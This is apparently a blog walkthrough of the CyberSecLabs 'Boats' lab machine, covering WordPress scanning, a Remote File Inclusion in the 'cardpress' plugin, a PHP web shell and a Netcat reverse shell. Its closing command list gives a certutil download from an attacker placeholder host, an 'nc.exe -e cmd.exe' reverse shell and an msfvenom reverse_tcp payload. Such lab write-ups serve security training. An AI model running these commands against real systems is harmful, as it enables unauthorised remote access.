Introduction

In this post tutorial, we went over a machine in cyberseclabs that goes by Boats. We did a typical penetration testing and we found a windows machine and a WordPress installation with PhpMyAdmin database that allows unauthenticated logins.

Machine Name: Boats

Difficulty: Easy

Skills Learned

  • WordPress Penetration Testing
  • PhpMyAdmin

Reconnaissance

The first thing I always do is run a scan to see what I’m up against. I used a tool called Nmap to find open ports and services on the machine. The scan showed me that the machine was running a Windows operating system with an Apache web server, MySQL, and WordPress. This gave me a good starting point.

Probing the Web Server

With a WordPress site in my sights, I started looking for common web vulnerabilities like XSS or SQL injection. I tried a few things, but the website had some decent security and was validating my inputs, so no luck there.

My next move was to use a specialized WordPress scanner called WPScan. This tool is great for finding known vulnerabilities in WordPress itself, as well as its themes and plugins. The scan revealed that the site was using an outdated and vulnerable plugin called “cardpress.”

Exploitation

A quick search for the “cardpress” plugin vulnerability told me it was susceptible to Remote File Inclusion (RFI). This is a serious flaw that allows me to trick the server into downloading and running a file from my own computer.

To exploit this, I set up a simple web server on my machine to host a malicious PHP web shell. Then, I crafted a special URL that used the RFI vulnerability to make the target server download and execute my shell. And just like that, I had a web shell, giving me command-line access to the server!

Getting a Better Shell

The web shell was good, but I wanted a more stable and interactive connection. So, my next step was to get a reverse shell. I set up a listener on my computer using Netcat and then used the web shell to download a Windows version of Netcat onto the target machine.

Once the Netcat executable was on the target, I ran a command to make it connect back to my listener. Success! I had a full reverse shell.

Privilege Escalation

Usually, after getting a shell, the next step is to find a way to escalate my privileges to the administrator or “root” level. However, when I checked my user privileges, I was pleasantly surprised to find that I was already running as “system“! This is the highest level of privilege on a Windows machine, so my work was done.

I also briefly mentioned a couple of other ways I could have approached this, like using Metasploit to create a payload or exploiting an unauthenticated PHPMyAdmin instance I found, but the method I chose was clean and effective.

Commands I Used

Here are the technical commands I used in the terminal during the demonstration:

  • nmap -sS -Pn [IP address]
  • nmap -sC -sV [IP address]
  • sudo wpscan --url [WordPress URL]
  • sudo wpscan --url [WordPress URL] -e ap
  • python3 -m http.server 8000
  • nc -lvnp 4545
  • systeminfo
  • sudo mv nc /var/www/html
  • sudo service apache2 start
  • certutil.exe -urlcache -f http://[Attacker IP]/nc64.exe nc.exe
  • nc.exe -e cmd.exe [Attacker IP] 4545
  • whoami /priv
  • whoami
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Attacker IP] LPORT=4545 -f exe -o shell.exe

Video Walk-through

, , , ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles